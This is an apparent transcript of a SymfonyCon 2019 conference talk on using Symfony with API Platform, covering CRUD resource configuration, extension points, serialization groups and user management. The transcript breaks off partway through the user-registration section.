difference of two points is the vector from second to first point. Definition at line 120 of file vgl_point_2d.h. Subtracting a vector from a point is the same as adding the inverse vector. Definition at line 142 of file vgl_point_2d.h. Subtracting a vector from a point is the same as adding the inverse vector. Definition at line 149 of file vgl_point_2d.h. Write "<vgl_point_2d x,y>" to stream. Definition at line 48 of file vgl_point_2d.txx. Read from stream, possibly with formatting. Either just reads two blank-separated numbers, or reads two comma-separated numbers, or reads two numbers in parenthesized form "(123, 321)" Definition at line 81 of file vgl_point_2_2d<int> need not be an int. Definition at line 194 of file vgl_point_2d.h.
http://public.kitware.com/vxl/doc/release/core/vgl/html/vgl__point__2d_8h.html
crawl-003
refinedweb
475
70.7
In this tutorial, I will teach you how to install a python library which helps in using nmap port scanner. The library is called python-nmap. What is nmap "Nmap (Network Mapper) is a security scanner originally written by Gordon Lyon (also known by his pseudonym Fyodor Vaskovich)[1] used to discover hosts and services on a computer network, thus creating a "map" of the network. To accomplish its goal, Nmap sends specially crafted packets to the target host and then analyzes the responses." Read more about nmap on wiki page and Nmap Commands. Install python-nmap in linux 1. Open a new terminal and use the wget utility to download the python-nmap library. For Python 2.x, use python-nmap-0.1.4.tar.gz. $ wget 2. Once the download is finished extract the content with the tar utility. $ tar xf python-nmap-0.1.4.tar.gz $ cd python-nmap-0.1.4 $ python setup.py install Verify if the python-nmap library is installed properly. On Ubuntu and Debian distributions install python-nmap, use: $ sudo apt-get update $ sudo apt-get install python-nmap How to use python-nmap 1. Open a new terminal, and run python with the following command. python 2. Import the nmap module. import nmap test = nmap.PortScanner() 3. Use the following line to scan your localhost for opening ports test_scanner = test.scan('127.0.0.1','80') 4. Print the test_scanner variable >>> test_scanner {'nmap': {'scanstats': {'uphosts': u'1', 'timestr': u'Fri Dec 20 21:33:55 2013', 'downhosts': u'0', 'totalhosts': u'1', 'elapsed': u'0.12'}, 'scaninfo': {u'tcp': {'services': u'80', 'method': u'syn'}}, 'command_line': u'nmap -oX - -p 80 -sV 127.0.0.1'}, 'scan': {u'127.0.0.1': {'status': {'state': u'up', 'reason': u'localhost-response'}, 'hostname': u'localhost', u'tcp': {80: {'state': u'closed', 'reason': u'reset', 'name': u'http'}}}}} As you can see from the above output a nested dictionary is printed on the screen. It has information about the host status, command-line arguments and port state. 5. Use the following piece of code to get information about the command used by nmap in our example. test_scanner['nmap']['command_line'] Here is the output. u'nmap -oX - -p 80 -sV 127.0.0.1' Conclusion In this article, we learned how to install python nmap on Linux. This library helps network administrators to scanning tasks and nmap scripts. Please let us know your suggestions. 3 Comments... add one File "", line 1, in File "/usr/local/lib/python2.7/dist-packages/nmap/nmap.py", line 137, in __init__ raise PortScannerError('nmap program was not found in path') nmap.nmap.PortScannerError: 'nmap program was not found in path' Traceback (most recent call last): File "", line 1, in File "nmap/nmap.py", line 137, in __init__ raise PortScannerError('nmap program was not found in path') nmap.nmap.PortScannerError: 'nmap program was not found in path Hi David, Make sure you have installed nmap and have it in $PATH $ sudo apt install nmap $ echo $PATH
https://linoxide.com/python-nmap-library/
CC-MAIN-2021-43
refinedweb
507
67.76
This chapter provides release notes about application and system programming on OpenVMS systems. 5.1 Incorrect Prototype Declared in lib$routines.h File V8.4 The prototype lib$stat_vm_64, declared in lib$routines.h has been corrected to match its definition. #ifdef __NEW_STARLET unsigned int lib$stat_vm_64( __int64 *code, unsigned __int64 *value_argument); #else /* __OLD_STARLET */ unsigned int lib$stat_vm_64(__unknown_params); #endif /* #ifdef __NEW_STARLET */ On OpenVMS Alpha Version 8.4, when you set breakpoints, the debugger will not be able to differentiate between the FORTRAN functions and declared variables of the same name in different compilation unit. 5.3 C++ Run-Time Library V8.3-1H1 Problems corrected in OpenVMS Version 8.3-1H1 include the following: cxxl$set_condition(pure_unix); condition_behavior enum declared in <cxx_exception.h> header has been extended to include pure_unix member. #include <stdio.h> #include <cxx_exception.h> void generateACCVIO() { *((int*)0) = 0; } int main() { cxxl$set_condition(pure_unix); try { generateACCVIO(); } catch(...) { puts("caught"); } } The following problems are fixed in this version of the C++ Library (Version 7.3 and higher compiler): #include <vector> int main() { std::vector<int> v; v.push_back(0); } istream_type& get(char_type *s, streamsize n, char_type delim); istream_type& get(char_type *s, streamsize n); The following restriction applies to the LIBRTL documentation for the lib$find_image_symbol run-time library routine: If your application might dynamically activate shareable images that use pthreads (or the older CMA thread interface), the main image must be linked with the pthread$rtl image. 5.5 AST Delivery Clarification in Programs using POSIX Threads It is possible to utilize ASTs in threaded programs. Section B.12.5 in the Guide to the POSIX Threads Library describes some general usage notes and cautions. However, that section does not make clear how AST delivery behaves in programs with upcalls disabled (which is the default configuration). In a program with upcalls disabled, user-mode ASTs will interrupt the thread that is executing when the AST is delivered. Therefore, the AST service routine cannot make any assumptions about the context in which it executes (with respect to thread ID, stack space available, and so on.) Also, note that much of the material in Section B.12.5 of the Guide describes a possible future version of OpenVMS. The description of generalized "per-thread" or thread-targeted ASTs represents possible future enhancements to the operating system. In all OpenVMS releases to date, however, user-mode ASTs are treated as if they are directed to the process as a whole. 5.6 RMS $PARSE Validation of Directory Files Starting with OpenVMS Version 8.3, the $PARSE service further validates all directories named in a directory specification to ensure that the directory characteristic is set. In previous OpenVMS versions, attempting to use a file with a .DIR extension that was not a directory resulted in a SS$_BADIRECTORY error from the $OPEN service, but not necessarily from the $PARSE service. As of Version 8.3, the error is consistently returned by the $PARSE service as long as it is not a syntax-only $PARSE. 5.7 No-IOLOCK8 Fibre Channel Port Drivers Many I/O subsystem components synchronize their operations across CPUs using the IOLOCK8 spinlock, which has made acquiring the spinlock a performance bottleneck. Starting with Version 8.3-1H1, each Fibre Channel port driver (SYS$PGQDRIVER, SYS$PGADRIVER and SYS$FGEDRIVER) device uses its own port-specific spinlock instead of IOLOCK8 to synchronize its internal operations. In most configurations, this results in a significant decrease in the amount of time each CPU spends waiting for the IOLOCK8 spinlock as well as some increase in the Fibre Channel I/O rate. Some minor changes are required to any class driver that connects to one of these new port drivers, so customers must determine whether they are running any non-HP class drivers that will not work with them. The simplest way to do this is to examine the output of the SDA command CLUE SCSI/SUMMARY and see whether the name of any third-party class driver device appears in the device hierarchy for an FGx0 or PGx0 port device in the "Device" column. For more information, refer to the notes following this sample SDA session. $ ANALYZE/SYSTEM OpenVMS system analyzer SDA> CLUE SCSI /SUMMARY SCSI Summary Configuration: --------------------------- SPDT Port STDT SCSI-Id SCDT SCSI-Lun Device UCB Type Rev -------------- -------------- -------------- -------- -------- ------ ---- 81624200 FGB0 8162CDC0 3 8162D240 0 GGA22 8162F380 HSV200 8162F180 1 DGA22801 8162FD40 HSV200 6100 81632900 2 DGA22802 81632AC0 HSV200 6100 816354C0 3 DGA22803 81635680 HSV200 6100 81638080 4 DGA22804 81638240 HSV200 6100 8162D400 4 8162DD80 0 GGA22 8163AC40 MRD200 8163B5C0 1 RJA22801 8163B780 RFD200 6100 8163C840 2 RJA22802 8163CA00 RFD200 6100 8163DAC0 3 RJA22803 8163DC80 RFD200 6100 8163ED40 4 RJA22804 8163EF00 RFD200 6100 Even though the physical device of Type MRD200 is not an HP qualified device, it does not present an IOLOCK8 problem because it is accessed through a GGAx unit, indicating that it uses the modified HP Generic class driver SYS$GKDRIVER. The RJA devices are not controlled by a modified HP class driver; they will not work with the new port drivers. The C++ Version 7.2 for OpenVMS for Integrity servers predefines the macro __INITIAL_POINTER_SIZE to 0, unlike the C++ Version 7.1 compiler, which leaves it undefined. This is an intentional change that makes the C++ Version 7.2 consistent with the C compiler and provides support for pointer_size pragmas, while C++ Version 7.1 does not. This change can cause diagnostics to appear in code that compiled cleanly with certain declarations selected by system header files that declare pointer types. This effect is most likely to appear in applications that use starlet headers and that compile with the __NEW_STARLET defined. If you cannot modify the application source code to conform to the new declarations, add the command-line qualifier /UNDEF=__INITIAL_POINTER_SIZE to the CXX command line to prevent the C++ Version 7.2 compiler from predefining this macro and thus causing the system headers to provide the same declarations as with Version 7.1 of the compiler. 5.9 Building DCE IDL C++ Applications Building DCE IDL C++ applications on CXX Version 7.2 and higher results in an undefined symbol linker warning. This is a known issue. To overcome this warning, contact HP Support Services to request any necessary patches. 5.10 Privileged Programs may Need a Recompile (Alpha Only) V8.2 OpenVMS Alpha Version 8.2 is a major version release in which a number of privileged data structures have changed. It may.11 Privileged Data Structures Updates OpenVMS Version 8.2 contains updates for a number of privileged data structures. These changes apply to both Alpha and Integrity server The versions of these subsystems are linked to.11.1 KPB Extensions Prior versions of OpenVMS supported the use of KPBs for kernel mode above IPL 2. To facilitate the transition to Integrity servers, usage of KPBs has been expanded for use in outer modes and all IPLs. This Alpha and Integrity servers change allows certain code that previously had private threading packages to make use of KPBs on both Alpha and Integrity servers. In order to support these changes to the kernel processes, some changes to the KPB structure were required. No source changes should be necessary for existing Alpha code. 5.11.2 CPU Name Space OpenVMS currently has an architectural limit of a maximum CPU ID of 31. Various internal data structures and data cells have allocated 32 bits for CPU masks. The space allocated for masks is being increased to 64 bits for Alpha and 1024 bits on Integrity servers to allow support for.11.3 64-Bit Logical Block Number (LBN) OpenVMS supports LBNs of only 32-bits. This limits the support of a disk volume to 2 TiB. The space allocated for internal LBN fields is being increased to 64-bits to allow support for larger disk volumes in the future. The existing longword LBN symbols will still be maintained and will be overlaid with a quadwords symbol. 5.11.4 Forking to a Dynamic Spinlock. This capability is added. The Code should use the symbol FKB$C_LENGTH for the size of a FKB. 5.11 recommends that you use the provided internal routines to link and unlink.11.11.7 Per-Thread Security Impacts Privileged Code and Device Drivers Permanent Change The method used to attach: #include <security-macros.h> /* Increment REFCNT of PSB that is now shared by both IRPs */ nsa_std$reference_psb( irp->irp$ar_psb ); Device drivers must.12 Applications Using Floating-Point Data The Itanium Integrity servers, Integrity servers, refer to the OpenVMS Floating-Point White Paper on the following website: V8.3. The filter is required only to make certain details of floating point exceptions conform to the IEEE standard. It is not required for normal floating point operation. 5.12.2 Ada Event Support (Integrity servers Only) V8.3 Ada event support (SET BREAK/EVENT=ada_event, where ada_event is one of the events described by SHOW EVENT) is enabled on OpenVMS Integrity servers. However, this support is incomplete. If you encounter problems with event breakpoints, switch to pthread events (SET EVENT_FACILITY pthread) as a workaround. Note that not all Ada events have an equivalent in the pthreads facility. 5.12.3 C++ Language Issues (Integrity servers Only) Condition: The debugger does note support debugging C++ programs compiled with /OPTIMIZE. Workaround: Compile C++ programs with /NOOPTIMIZE. 5.13 Ada Compiler(Integrity servers Only) GNAT Pro (Ada 83, Ada 95 and Ada 2005) is available from AdaCore. Contact AdaCore at or sales@adacore.com for more information. 5.14.15.16 C Run-Time Library The following sections describe changes and corrections to the C Run-Time Library (RTL). 5.16.1 C RTL TCP/IP Header File Updates The C RTL ships header files for users to call TCP/IP. C RTL places the headers into the C RTL header library (DECC$RTLDEF.TLB). New header files are added, as appropriate for new features in TCP/IP. SCTP.H SCTP_UIO.H These header files provide Stream Control Transmission Protocol (SCTP) support. For more information on SCTP, see the HP TCP/IP Services for OpenVMS Version 5.7 Release Notes. 5.16.2.16.3 that the C RTL selects the appropriate prefixing for the listed functions. 5.16.4.16.5 Header File <builtins.h> __CMP_SWAP* and _Interlocked* Visible to C++ The compare and swap built-ins (__CMP_SWAP* and _Interlocked*) in <builtins.h> did not include the OpenVMS Alpha C++ compiler. Because HP C++ Version 7.1 requires them, a change in conditional compilation now makes these built-ins visible. 5.16.6 Builtin __fci Added for Integrity servers The <builtins.h> header file is updated with the prototype for the new __fci built-in (a built-in for the fc.i instruction) now supported by the HP C compiler.
http://h71000.www7.hp.com/doc/84final/6677/6677pro_prog.html
CC-MAIN-2015-18
refinedweb
1,809
55.95
What's New in QMetaType + QVariant Wednesday October 21, 2020 by Fabian Kosmale | Comments As you might know, Qt has a metatype system which provides run-time dynamic information about types. It enables storing your types in QVariant, queued connections in the signal slot system and is used throughout the QML engine. With the upcoming Qt 6.0 release, we used the chance to revisit its fundamentals and make use of the functionality that C++17 gives us. In the following, we examine those changes, and explain how they might affect your projects. QMetaType knows your types even better now In Qt 5, QMetaType contained the information necessary to default construct a type, to copy it and to destroy it. Moreover it knew how to save it to and load it from QDataStream and stored some flags to describe various properties of it (e.g. whether the type is trivial, an enumeration, etc.). Additionally, it would store the QMetaObject of the type if it had any, and a numeric id to identify the type as well as the types name. Lastly, QMetaType contained functionality to compare objects of a certain (meta-)type, to print them with qDebug and to convert from one type to another. You had to use QMetaType::registerComparators() and the other static register functions in QMetaType to actually make use of that functionality, though. That would put pointers to those functions into corresponding registries, basically mappings from metatype-ids to function pointers. With Qt 6, the first thing we did was to extend the information stored in QMetaType: Modern C++ is now almost 10 years old, so it was about time to store information about the move constructor in QMetaType. And to provide better support for overaligned types, we now also store the alignment requirements of your types. Moreover, we considered the registries to be a bit clunky. After all, why should we require you to call QMetaType::registerEqualsComparator() when we could already know this by simply looking at the type? So in Qt 6, QMetaType::registerEqualsComparator, QMetaType::registerComparators, qRegisterMetaTypeStreamOperators and QMetaType::registerDebugStreamOperator have been removed. The metatype system will instead know about those automatically. The outlier here is QMetaType::registerConverterFunction. As there is no way to know reliably which functions should be used for conversions, and we allow to register basically arbitrary conversions, that functionality stays the same as it was in Qt 5. With those changes we could also unify the handling of Qt internal types and user registered types: This means that for instance QMetaType::compare works now with int: #include <QMetaType> #include <QDebug> int main() { int i = 1; int j = 2; int result = 0; const bool ok = QMetaType::compare(&i, &j, QMetaType::Int, &result); if (ok) { // prints -1 as expected in Qt 6 qDebug() << result; } else { // This would get printed in Qt 5 qDebug() << "Cannot compare integer with QMetaType :-("; } } QMetaType knows your types at compile time Thanks to various advancements in C++’s reflective capabilities, we can now get all the information we require from a type at compile time – including its name. If you are interested in how this is implemented, you should look at this excellent StackOverflow answer. In Qt we use a very similar approach, albeit with certain extensions and workarounds for older compilers. What’s even more interesting than the implementation though is what it means for you. First of all, instead of creating a QMetaType via either QMetaType oldWay1 = QMetaType::fromName("KnownTypeName"); or QMetaType oldWay2(knownTypeID); it is now recommended that you create your QMetaTypes with QMetaType newWay = QMetaType::fromType<MyType>(); if you know the type. The other methods still exist, and are useful when you do not know the type at compile time. However, fromType avoids one lookup from id/name to QMetaType at runtime. Note that since Qt 5.15 you could already use fromType, but there it would still do a lookup. Moreover you could not copy QMetaType, limiting its usefulness and making it more convenient to pass type ids around. However, in Qt 6, QMetaType is copyable. You might now wonder what this means for Q_DECLARE_METATYPE and qRegisterMetaType. After all, do we really need them if we can create QMetaTypes at compile time? Let’s look at an example first: #include <QMetaType> #include <QVariant> #include <QDebug> struct MyType { int i = 42; friend QDebug operator<<(QDebug dbg, MyType t) { QDebugStateSaver saver(dbg); dbg.nospace() << "MyType with i = " << t.i; return dbg; } }; int main() { MyType myInstance; QVariant var = QVariant::fromValue(myInstance); qDebug() << var; } In Qt 5, this would lead to the following error message with gcc (+ a a few more warnings about failed instantiations): /usr/include/qt/QtCore/qmetatype.h: In instantiation of 'constexpr int qMetaTypeId() [with T = MyType]': /usr/include/qt/QtCore/qvariant.h:371:37: required from 'static QVariant QVariant::fromValue(const T&) [with T = MyType]' test.cpp:16:48: required from here /usr/include/qt/QtCore/qglobal.h:121:63: error: static assertion failed: Type is not registered, please use the Q_DECLARE_METATYPE macro to make it known to Qt's meta-object system 121 | # define Q_STATIC_ASSERT_X(Condition, Message) static_assert(bool(Condition), Message) | ^~~~~~~~~~~~~~~ /usr/include/qt/QtCore/qmetatype.h:1916:5: note: in expansion of macro 'Q_STATIC_ASSERT_X' 1916 | Q_STATIC_ASSERT_X(QMetaTypeId2<T>::Defined, "Type is not registered, please use the Q_DECLARE_METATYPE macro to make it known to Qt's meta-object system"); That’s not great, but at least it tells you that you need to use Q_DECLARE_METATYPE. However, with Qt 6, it will compile just fine and the executable will print QVariant(MyType, MyType with i = 42), as one would expect. And not only QVariant, but queued connections work too without an explicit Q_DECLARE_METATYPE. Now, what about qRegisterMetaType? That one is unfortunately still needed – assuming you need name to type lookups. While a QMetaType object knows the name of the type it has been constructed from, the global name to metatype mapping only occurs once one either calls qRegisterMetaType. To illustrate: struct Custom {}; const auto myMetaType = QMetaType::fromType<Custom>(); // At this point, we do not know that the name "Custom" maps to the type Custom int id = QMetaType::type("Custom"); Q_ASSERT(id == QMetaType::UnknownType); qRegisterMetaType<Custom>(); // from now on, the name -> type mapping works, too id = QMetaType::type("Custom") Q_ASSERT(id == myMetaType.id()); Having the name to type mappings available is still required if you use old style signal-slot-connections, or when using QMetaObject::invokeMethod. QMetaType knows your properties’ and methods’ types The ability of creating QMetaType at compile time also allows us to store the metatypes of a class’ properties in its QMetaObject. This change is mainly motivated by QML, where this change brings us enhanced performance and it the future hopefully a reduced memory consumption1. Unfortunately, this change puts a new requirement on the types used in property declarations: The type (or if it’s a pointer/reference, the pointed to type) needs to be complete when moc sees it. To illustrate the issue, consider the following example: // example.h #include <QObject> struct S; class MyClass : public QObject { Q_OBJECT Q_PROPERTY(S* m_s MEMBER m_s); S *m_s = nullptr; public: MyClass(QObject *parent = nullptr) : QObject(parent) {} }; In Qt 5, there wasn’t an issue with this. However, in Qt 6, you might get an error like In file included from qt/qtbase/include/QtCore/qmetatype.h:1, from qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qobject.h:54, from qt/qtbase/include/QtCore/qobject.h:1, from qt/qtbase/include/QtCore/QObject:1, from example.h:1, from moc_example.cpp:10: qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h: In instantiation of 'struct QtPrivate::IsPointerToTypeDerivedFromQObject<S*>': qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:1073:63: required from 'struct QtPrivate::QMetaTypeTypeFlags<S*>' qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:2187:40: required from 'QtPrivate::QMetaTypeInterface QtPrivate::QMetaTypeForType<S*>::metaType' qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:2309:16: required from 'constexpr QtPrivate::QMetaTypeInterface* QtPrivate::qTryMetaTypeInterfaceForType() [with Unique = qt_meta_stringdata_MyClass_t; TypeCompletePair = QtPrivate::TypeAndForceComplete<S*, std::integral_constant<bool, true> >]' qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:2328:55: required from 'QtPrivate::QMetaTypeInterface* const qt_incomplete_metaTypeArray [1]<qt_meta_stringdata_MyClass_t, QtPrivate::TypeAndForceComplete<S*, std::integral_constant<bool, true> > >' moc_example.cpp:102:1: required from here qt/qtbase/include/QtCore/../../../../qtdev/qtbase/src/corelib/kernel/qmetatype.h:766:23: error: invalid application of 'sizeof' to incomplete type 'S' 766 | static_assert(sizeof(T), "Type argument of Q_PROPERTY or Q_DECLARE_METATYPE(T*) must be fully defined"); | ^~~~~~~~~ make: *** [Makefile:882: moc_example.o] Error 1 Note the static assert which tells you that the type must be fully defined. This can be fixed in three different ways: - Instead of forward declaring the class, simply include the header in which S is defined. - As including additional headers can negatively affect build times, you can use the Q_MOC_INCLUDEmacro instead. Then only moc will see the include. Simply use Q_MOC_INCLUDE("myheader.h")instead of #include "myheader.h" - Alternatively you could include the moc generated file in your cpp file. This of course requires that the needed header is actually included there.2 Lastly, there are rare cases where you have an intentionally opaque pointer. In that case, you need to use Q_DECLARE_OPAQUE_POINTER is used. This is certainly suboptimal, though in our experience properties with incomplete types are not that common. In addition, we’re currently investigating extending our tooling support to make at least the detecion of this issue automatic. Similarly, we also try to create the metatypes for return types and parameters of methods known to the metaobject system (signals, slots and Q_INVOKABLE functions). This has the advantage of of avoiding a few name to type lookups in string based connections and inside the QML engine. However, we are aware that incomplete types are very common in methdos. Therefore, for methods we still have a fallback path, and method types are not required to be complete, so no changes are needed there. If we can, we store the metatype at compile time in the metaobject, but if not we will simply look it up at runtime. There’s one exception though: If you register your class with QML by using one of the declarative type registration macros ( QML_ELEMENT and friends), we require even method types to be complete. In that case we assume that all metamethods which you expose are actually meant to be used in QML, and you therefore prefer to avoid any additional runtime type lookups (note that this does not affect the parent class’ metamethods). QMetaType powers QVariant After we reworked QMetaType, we could also clean up the internals of our venerable QVariant class. Before Qt 6, QVariant internally distinguished between user types and builtin Qt types, significantly complicating the class. QVariant also could only store values that were at most the size of the maximum of sizeof(void *) and sizeof(double) in its internal buffer. Anything else would be heap allocated. With Qt 6, anything else would include commonly used classes like QString (as QString is 3* sizeof(void *) big in Qt 6). So clearly we had to rework QVariant for Qt 6. And rework it we did! We managed to simplify its internal architecture, and made common use cases faster. This includes changing QVariant so that it now store types <= 3*sizeof(void *) in its SSO buffer. Besides allowing the continued storage of QStrings without additional allocations, this also makes it possible to store polymorphic PIMPL’d types like QImage3 in QVariant. This should prove beneficial for item models returning images in data(). We also introduced some behaviour changes in existing methods of QVariant. We are aware that silent behaviour changes are a common source of bugs, but deemed the current behaviour to be bugprone enough to warrant it. Here’s the list of what changed: - QVariant used to forward isNull()calls to its contained type – but only for a limited set of Qt’s own types. This has been changed, and isNull()now only returns true if the QVariant is empty or contains a nullptr. - QVariant’s operator==now uses QMetaType::equalsfor the comparison. This implies a behavioral change for some graphical types like QPixmap, QImage and QIcon that will never compare equal in Qt 6 (as they do not have a comparison operator). Moreover, floating point numbers inside a QVariant are now no longer compared via qFuzzyCompare, but instead use exact comparisons. Another noteworthy change is that we removed QVariant’s constructor taking a QDataStream. Instead of constructing a QVariant holding a QDataStream (which would be in line with the other constructors), it instead would attempt to load a QVariant from the datastream. If you actually want this behaviour, use operator>> instead. Note also that QVariant::Type and its related methods have been deprecated in Qt 6 (but still exist). A replacement API working with QMetaType::Type has been added. This is useful as QVariant::type() can only return QVariant::UserType for user types, whereas the new QVariant::typeId() always returns the concrete metatype. QVariant::userType does the same (and did so already in Qt 5), but from its name it wasn’t apparent that it also works for builtin types. Lastly, we added some new functionality to QVariant: QVariant::compare(const Variant &lhs, const QVariant &rhs)can be used to compare two variants. It returns a std::optional<int>. If the values were incomparable (because the types are different, or because the type itself is not comparable) , std::nulloptis returned. Otherwise, an optional containing an int is returned. The number is negative f the contained value in lhsis smaller than the one in rhs, 0 if they are equal, and positive otherwise. - It’s now possible to construct an empty QVariant from a QMetaType (instead of passing in a QMetaType::Type, which would then be used to construct a QMetaType). For similar reasons, it’s possible to pass QMetaType to the convertfunction. - QVariant now supports storing overaligned types, thanks to QMetaType storing alignment information in Qt 6. Conclusion and Outlook The internals of Qt’s metatype system are a part of Qt which most users rarely interact with. Nevertheless, it’s at the heart of the framework, and used to implement more user-centric parts like QML, QVariant, QtDbus, Qt Remote Objects and ActiveQt. With the updates to it in Qt 6, we hope to have it serve us as well in the next decade as it did in the last. Speaking of the next decade, you might wonder what the future holds in store for the metatype system. Besides our already mentioned plans to use it to enhance the QML engine, we also intend to improve the signal/slot connection logic. Both of those changes should not affect your code in any way, but simply improve performance and memory usage in a few places. In the farther future, we also certainly will monitor how C++ evolves, especially when it comes to static reflection and meta-classes. While we do not expect moc to go away anytime soon, we do consider replacing some of its functionality with C++ features once they become widely available. Oh, and by the way, we have added one more piece of new functionality in Qt 6.0: QMetaContainer. What’s that you ask? Well, watch this space for another blogpost coming soon and you’ll know. In 5.15 and 6.0, the QML engine copies the information from the property metatypes into a custom datastructure, called PropertyCache. By having the property metatype available, we can already speed this up a bit, as we do not have to lookup the metatypes by name. In the upcoming releases, we want remove the PropertyCache completely, and instead reuise the metatypes from the metaobject.↩︎ Doing this might also improve your buildtimes as a welcome side effect.↩︎ Though that depends on a pending change to make QPaintDevice a bit smaller.
https://www.qt.io/blog/whats-new-in-qmetatype-qvariant
CC-MAIN-2021-39
refinedweb
2,640
53.51
Scroll down to the script below, click on any sentence (including terminal blocks!) to jump to that spot in the video! If you liked what you've learned so far, dive in! video, code and script downloads. Tip SymfonyCon 2019 Amsterdam presentation by Antonio Peric-Mazar. Why. Are you interested? Sign up for the talk. Hello? can you hear me? Yeah. Cool. Hi. Morning. How are you enjoying the conference? Yeah. Cool. Uh, first I want to thank you, the entire Symfony team for inviting me to speak here. Uh, I did many of conferences. This one was on my bucket list for awhile, so I'm really, really happy to be here. Also, thanks to the sponsors for making this happen. Uh, before I start, I want to get to know more about you. So first, who is using Symfony 5 in production? There is a guy, okay. Who is using API platform. Okay. Like 30% of the people. Cool. Uh, so my name is Antonio Perić-Mažar. I'm from Croatia from split. I'm the CEO of Locastic. I'm also co founder of the Litto, it is not software development agency. It is different industry. And we also, two years ago co found a Tinel Meetup, which is in our industry. And every month we bring one foreign speaker to our home city to do of course free meetup, with beers, pizza and hanging around. Uh, we are very proud about that. Just few words about company. We are doing bunch of Symfony backend based projects. We are also doing a lot of user experience projects working with the banks, telecom operators. We are not like big company only 20 people, but we are like really do, I would say good things. Uh, what is our, what is the context of my token API platform experience? So one of the biggest projects that we did, which is based on Symfony and API platform is ticketing platform for GFNY organization. That is the franchise business that is running in 26 countries and supporting our users from 82 countries in eight different languages including Hebrew and Indonesia. We are having that in production for a year and a half serving approximately 60,000 tickets per year. The complexity of this project is not like high traffic or like high availability. It's more like in domain that the main is really, really complex on the front end it's React with Redux on the backend is fully Symfony with API platform. With API platform. We also did some social networks chat based, and some matching similar to the Tinder. I assume that some of you know what's the Tinder and also with a few like enterprise CRM, ERP applications so that that is something that I want to share some parts of our experience in this talk. When I planned the talk I was like aiming to talk only about this ticketing system but actually when I start writing on a paper I noticed there is like bunch of things that are repeating so I pulled a few of them and I will try to show you as best as I can what what we are doing and how we are doing the things. What is the API platform because only like 40% people is using the API platform. I will just do quick introduction to the API platform, so if we want to trust Fabien Potencier air, that's the, that's the most powerful API platform in any language in the world. It is based on Symfony. It is dedicated to API dream projects. It contains PHP library to create fully PHP features, APIs, supporting industry standards, providing some Javascript libraries shipped with Docker and Kubernetes integration and it's now Symfony official API stack. It's very, it's very powerful tool containing many feature like simple creating crud, data validation, pagination, filtering, sorting, hypermedia, GraphQL support, whatever. Basically whatever you need to build modern APIs in matter of minutes. So just for example, I want to show you how simple it is to create crud in literally for the seconds. So basically the first thing that we need to do is create some model, some entity, regular entity in a Symfony. So it has a name, it has ID, nothing, nothing special. The second thing is that we need to map that to the our ORM system and we need, if we want to have some validation and the only thing that we need to expose this as a resource, as the API resources to do one line of configuration. I'm using yaml. You can use XML you can use annotations, you can use whatever you want, but this is the only thing that you need to do. And you are getting fully operational crud for API, fully operational API resource with beautiful documentation. You can play it, you can test it here it, it works perfectly. So what we are getting, we are getting two types of operation that's collection operations and that's item operations to our mandatory GET on a collection and GET on the item. Others can be removed or modified or whatever. Now this is the as as we don't have controllers, we don't have anything here. We just have configuration for the API resources. We have bunch of extension points that we can use to build our business logic. So the best thing about API platform is that it's not focusing you to think about framework itself, it's you, it's you are focusing even more than with Symfony 4 on building your value, business value for your users. Okay, so at the top of the end is the kernel events. That is regular Symfony events. But suggestion is to use other extension points because kernel events works only with the rest APIs and other extension points will work even if you are using GraphQL as your, as your APIs, uh, it is using action domain responder pattern which is like better alternative for HTTP comparing to MVC how it works, so user GET like sends something to the URI which is requesting some action. Action asks domain to do some logic and then responder or gives respond to the end user. If you divide that in the API platform, we have separation like this on the left side in the action part we have operational resources and actions that we did with configuration. Then we have data providers, data persister and other things which contains some kind of hard domain logic and then we have serialization response which is actually responder with the things that I show you as the extension point. You can basically do the changes in any of these free parts. We have also serialization group divides in two contexts. One is normalized context. Second one is deserialized context. Why this is very powerful. It's because in this way with very simple configuration, we can have different read write models without even writing the custom code for that so we can normalize a context. You can specify which fields are you requiring. For example, for creating or updating the resource and with deserialize you can say what you want to expose to the user. Okay, so how, how the regular project looks like with the, with the API platform and a Symfony. The things that I will talk today, it's more like about big Symfony projects which are using the API platform as one part of the application. The one part that is actually communicating with any part, with any client's application. It can be your watch, it can be your fridge, it can be your single page application, it can be your computer, it can be your car, whatever you want. We are exposing API to the API platform. We are getting some amazing thing to implement our logic. So today you will see that and our projects, we are quite, I know that we are at the conferences talking about a lot about decoupling from the framework, but I think that some points we are missing to talk how to leverage the framework. Like for example, in our case, the fully decoupling from the Symfony is not something that you are doing because in the future we will never move from the Symfony even more maybe from the PHP but not from the Symfony. So leveraging the framework, it's a huge advantage for us, especially if we have nice structure of the projects and how we can do that. So first advice that I have for you is for configuration. Use the yaml if you have a longterm project. Did this configuration can be quite extensive and I know that annotations are really easy. Nice to start. But imagine this having inner annotations, this is what I selected. It's the configuration for only one resource. This can be even improved this file, because we can separate this in few files, which will be yaml files of course. But imagine this having in one huge annotation with bunch of other things. It can be really, really messy. I personally use annotation for a demo because they will save me a bunch of time, but if we are doing like longterm projects, we prefer yaml. You can use whatever you want. This is just my advice. Okay. First thing that every application has is users. So let's see. Few tips and tricks, how you can do user management or security. If you have listened to the security talk yesterday, probably some of the things will be familiar to you, but there are few touchpoints that I want you to have intention to that. So basically if you are using API platform, you don't want to use FOSUserBundle. I assume that you are all aware of FOSUserBundle but FOSUserBundle. It's not built for REST. It's built for some quick user management and it brings a lot of over head with itself. As your project grows, you will have more and more problem overriding the things that are built in FOSUserBundle. For example, I'm working at the moment at one legacy project and I spent the days removing some parts of the FOSUserBundle, finally I'm clean so I can, I can change it. What you can use, it's actually Doctrine User Provider which is included in Symfony 4 so it's simple and easy to integrate. Then you need to, only thing that you need to do is bin/console maker:user. You will get fully working user with everything setup in security and the only thing in rest API that you need to implement some action. For example, registration action. So this is how it looks. It needs to implement UserInterface and I set up already some some groups, some from writes some from read, so normalization and the denormalization context. Second thing is that I need to map that to my ORM and database and then I need configure the resources, as you can see here, this is a little bigger configuration because I set up the normalization context and denormalization context. Okay, so the next thing is what I want to do, I want to hash password. When I'm saving, when I'm storing user to the database, I want to implement registration. The only thing that I need to do is create UserDataPersister. In the UserDataPersister I have the method which is the second method which is actually the first after, after the construct which returns do I support this method for this entity? If it is true it will do persist or 